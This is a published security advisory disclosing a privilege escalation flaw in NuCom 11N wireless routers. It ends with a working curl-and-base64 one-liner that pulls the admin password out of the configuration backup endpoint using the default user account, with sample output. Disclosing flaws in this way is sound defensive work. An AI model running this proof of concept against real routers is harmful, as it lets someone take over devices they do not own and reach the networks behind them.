NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation Vendor: NUEVAS COMUNICACIONES IBERIA, S.A. Product web page: https://www.nucom.es Affected version: 5.07.90_multi_NCM01 5.07.89_multi_NCM01 5.07.72_multi_NCM01 Summary: The NC routers upgrades your network to the next generation of WiFi. With combined wireless speeds of up to 1750 Mbps, the device provides better speeds and wireless range. Includes 2 FXS ports for any VoIP service. If you prefer a wired connection, the NC routers have gigabit ports to provide an incredibly fast, lag-free experience. 3.0 ports allow you to power a robust home Internet network by sharing printers, flash storage, FTP servers, or media players. Desc: The application suffers from a privilege escalation vulnerability. The non-privileged default user (user:user) can elevate his/her privileges by sending a HTTP GET request to the configuration backup endpoint and disclose the http super password (admin credentials) in Base64 encoded value. Once authenticated as admin, an attacker will be granted access to the additional and privileged pages. Tested on: GoAhead-Webs Tenda Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5629 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php 01.03.2021 -- lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \ > curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \ > -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \ > grep -oP '(?<=http_supper_passwd=).*' | \ > base64 -d 2>/dev/null | \ > xargs echo -n ; \ > echo -e '\n-----------\n' The admin password is: MammaMia123 ----------- lqwrm@metalgear:~/prive$